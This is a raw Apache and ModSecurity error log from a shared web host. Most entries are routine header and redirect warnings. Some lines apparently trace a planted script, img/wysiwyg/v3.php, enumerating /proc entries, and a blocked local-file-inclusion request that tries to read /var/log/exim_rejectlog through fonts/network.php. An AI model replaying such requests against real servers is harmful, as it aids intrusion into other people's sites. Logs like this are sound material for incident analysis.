[Tue May 12 01:02:29.602568 2026] [security2:error] [pid 1691274:tid 1691277] [client 43.163.84.198:53028] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "dev.rentparadise.fr"] [uri "/"] [unique_id "agJgBVfdQaraX_prmqf9tQAAAAA"]
[Tue May 12 01:02:33.174058 2026] [security2:error] [pid 1691274:tid 1691283] [client 43.163.84.198:50452] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "dev.rentparadise.fr"] [uri "/dev/"] [unique_id "agJgCVfdQaraX_prmqf9ugAAAAY"], referer: http://dev.rentparadise.fr
[Tue May 12 01:02:33.176461 2026] [core:error] [pid 1691274:tid 1691283] [client 43.163.84.198:50452] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://dev.rentparadise.fr
[Tue May 12 01:02:33.176480 2026] [core:error] [pid 1691274:tid 1691283] [client 43.163.84.198:50452] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace., referer: http://dev.rentparadise.fr
PHP Warning:  filesize(): stat failed for /proc/691/task/691/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/691/task/691/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/691/task/691/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/691/task/691/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/691/task/691/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/691/task/691/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/115/task/115/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/115/task/115/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/115/task/115/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/115/task/115/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/115/task/115/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/115/task/115/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/566/task/566/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/566/task/566/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/566/task/566/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/566/task/566/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/566/task/566/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/566/task/566/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 01:04:07.247634 2026] [security2:error] [pid 1691274:tid 1691290] [client 43.155.140.157:52180] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rentparadise.fr"] [uri "/wp-json/wp/v2/mphb_room_type/5374"] [unique_id "agJgZ1fdQaraX_prmqf-mAAAAA0"]
PHP Warning:  filesize(): stat failed for /proc/17/task/17/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/17/task/17/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/17/task/17/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/17/task/17/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/17/task/17/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/17/task/17/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 01:04:54.752386 2026] [security2:error] [pid 1630927:tid 1630941] [client 43.160.225.169:39636] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "rixonephotography.com"] [uri "/gallery/couples/"] [unique_id "agJglmiGYYhUwDaJINnGiwAAAUs"]
[Tue May 12 01:04:59.685363 2026] [security2:error] [pid 1695975:tid 1695996] [client 101.32.15.141:57882] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.castiglionecorporatefinance.fr"] [uri "/wp-json/oembed/1.0/embed"] [unique_id "agJgm9VI9ymHBxup749tCgAAAJI"]
PHP Warning:  filesize(): stat failed for /proc/108/task/108/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/108/task/108/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/108/task/108/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/108/task/108/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/108/task/108/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/108/task/108/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 01:05:35.074137 2026] [security2:error] [pid 1691274:tid 1691291] [client 43.157.191.20:59076] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.labaujue.com"] [uri "/"] [unique_id "agJgv1fdQaraX_prmqf_dwAAAA8"]
[Tue May 12 01:05:36.715655 2026] [autoindex:error] [pid 1707624:tid 1707683] [client 3.254.206.226:48822] AH01276: Cannot serve directory /home/totalcloud/public_html/: No matching DirectoryIndex (index.php,index.php5,index.php4,index.php3,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.jp,index.phtml,index.shtml,index.xhtml,index.html,index.htm,index.wml,Default.html,Default.htm,default.html,default.htm,home.html,home.htm,index.js) found, and server-generated directory index forbidden by Options directive
[Tue May 12 01:06:06.131143 2026] [security2:error] [pid 1707624:tid 1707687] [client 43.162.95.192:37030] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "habilis.space"] [uri "/"] [unique_id "agJg3rOxS7i6i_mT2NKqeQAAAEU"]
[Tue May 12 01:06:09.663654 2026] [security2:error] [pid 1709071:tid 1709099] [client 43.162.95.192:42764] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "habilis.space"] [uri "/cgi-sys/suspendedpage.cgi"] [unique_id "agJg4bvMumyrWMfSu7qKnwAAAMw"], referer: http://habilis.space
[Tue May 12 01:06:34.179515 2026] [security2:error] [pid 1707624:tid 1707705] [client 43.135.115.233:35118] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.moncampingcarenligne.com"] [uri "/"] [unique_id "agJg-rOxS7i6i_mT2NKqnwAAAFc"]
PHP Warning:  filesize(): stat failed for /proc/1704253/task/1704256/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704253/task/1704256/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704253/task/1704256/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704253/task/1704256/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1704253/task/1704256/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1704253/task/1704256/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/16/task/16/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/16/task/16/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/16/task/16/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/16/task/16/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/16/task/16/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/16/task/16/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/18/task/18/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/18/task/18/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/18/task/18/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/18/task/18/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/18/task/18/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/18/task/18/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/56/task/56/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/56/task/56/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/56/task/56/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/56/task/56/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/56/task/56/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/56/task/56/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/20/task/20/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/20/task/20/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/20/task/20/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/20/task/20/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/20/task/20/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/20/task/20/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 01:07:12.676628 2026] [authz_core:error] [pid 1630927:tid 1630942] [client 216.73.216.110:34986] AH01630: client denied by server configuration: /home/missmand/public_html/missmandarine.ch/learning/old/main/template/default/auth/error_log
[Tue May 12 01:07:20.089783 2026] [security2:error] [pid 1630927:tid 1630937] [client 43.135.138.128:37104] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "krakoukas.com"] [uri "/category/informatique/code-source/"] [unique_id "agJhKGiGYYhUwDaJINnHkwAAAUc"]
PHP Warning:  filesize(): stat failed for /proc/69/task/69/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/69/task/69/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/69/task/69/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/69/task/69/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/69/task/69/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/69/task/69/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/695/task/695/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/695/task/695/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/695/task/695/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/695/task/695/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/695/task/695/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/695/task/695/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 01:09:05.792487 2026] [security2:error] [pid 1695975:tid 1695990] [client 162.62.231.139:33918] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "piregwan-genesis.com"] [uri "/"] [unique_id "agJhkdVI9ymHBxup749ubwAAAIw"], referer: http://piregwan-genesis.com
[Tue May 12 01:09:12.349273 2026] [security2:error] [pid 1707624:tid 1707699] [client 43.157.175.122:44666] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pweil.com"] [uri "/"] [unique_id "agJhmLOxS7i6i_mT2NKrYgAAAFE"]
[Tue May 12 01:09:30.820334 2026] [security2:error] [pid 1707624:tid 1707687] [client 43.156.156.96:36882] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "of-crystal-lake.net"] [uri "/page.php"] [unique_id "agJhqrOxS7i6i_mT2NKrewAAAEU"]
[Tue May 12 01:09:38.951691 2026] [security2:error] [pid 1695975:tid 1695991] [client 216.73.216.110:31163] ModSecurity: Warning. Matched phrase "var/log/exim_rejectlog" at ARGS:filesrc. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "41"] [id "930120"] [rev "4"] [msg "OS File Access Attempt"] [data "Matched Data: var/log/exim_rejectlog found within ARGS:filesrc: /var/log/exim_rejectlog-20260504.gz"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agJhstVI9ymHBxup749ulwAAAI0"]
[Tue May 12 01:09:38.952282 2026] [security2:error] [pid 1695975:tid 1695991] [client 216.73.216.110:31163] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "www.missmandarine.com"] [uri "/missmandarine.ch/fonts/network.php"] [unique_id "agJhstVI9ymHBxup749ulwAAAI0"]
[Tue May 12 01:09:39.037188 2026] [security2:error] [pid 1695975:tid 1695991] [client 216.73.216.110:31163] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): OS File Access Attempt"] [tag "event-correlation"] [hostname "www.missmandarine.com"] [uri "/cgi-sys/ea-php74/index.php"] [unique_id "agJhstVI9ymHBxup749ulwAAAI0"]
PHP Warning:  filesize(): stat failed for /proc/1705065/task/1705065/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705065/task/1705065/cwd in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705065/task/1705065/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705065/task/1705065/exe in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  filesize(): stat failed for /proc/1705065/task/1705065/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
PHP Warning:  fileperms(): stat failed for /proc/1705065/task/1705065/root in /home/missmand/public_html/img/wysiwyg/v3.php on line 1
[Tue May 12 01:10:36.220134 2026] [security2:error] [pid 1707624:tid 1707697] [client 49.51.33.159:50286] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/embed/"] [unique_id "agJh7LOxS7i6i_mT2NKryAAAAE8"]
[Tue May 12 01:10:40.585320 2026] [security2:error] [pid 1709071:tid 1709102] [client 49.51.33.159:54586] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "pole-de-mobilite-regional.com"] [uri "/"] [unique_id "agJh8LvMumyrWMfSu7qMDQAAAM8"], referer: https://pole-de-mobilite-regional.com/embed/
[Tue May 12 01:10:43.178632 2026] [security2:error] [pid 1695975:tid 1695996] [client 43.159.128.155:36076] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "la-grande-fabrique.com"] [uri "/index.php"] [unique_id "agJh89VI9ymHBxup749u3AAAAJI"]
[Tue May 12 01:10:47.792539 2026] [security2:error] [pid 1695975:tid 1695994] [client 43.153.48.240:36862] ModSecurity: Warning. Pattern match "\\\\b(keep-alive|close),\\\\s?(keep-alive|close)\\\\b" at REQUEST_HEADERS:Connection. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "198"] [id "920210"] [rev "2"] [msg "Multiple/Conflicting Connection Header Data Found."] [data "keep-alive, close"] [severity "WARNING"] [ver "OWASP_CRS/3.0.0"] [maturity "6"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/PROTOCOL_VIOLATION/INVALID_HREQ"] [hostname "www.jeanboyault.fr"] [uri "/wp-content/uploads/2019/08/CentaureaDemo.ttf_.zip"] [unique_id "agJh99VI9ymHBxup749u3QAAAJA"]
[Tue May 12 01:11:27.157069 2026] [core:error] [pid 1707624:tid 1707692] [client 4.193.137.131:1127] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:27.157292 2026] [core:error] [pid 1707624:tid 1707692] [client 4.193.137.131:1127] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:27.646718 2026] [core:error] [pid 1707624:tid 1707683] [client 4.193.137.131:1134] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:27.646751 2026] [core:error] [pid 1707624:tid 1707683] [client 4.193.137.131:1134] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:28.121786 2026] [core:error] [pid 1630927:tid 1630939] [client 4.193.137.131:1092] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
[Tue May 12 01:11:28.121824 2026] [core:error] [pid 1630927:tid 1630939] [client 4.193.137.131:1092] AH00124: Request exceeded the limit of 10 internal redirects due to probable configuration error. Use 'LimitInternalRecursion' to increase the limit if necessary. Use 'LogLevel debug' to get a backtrace.
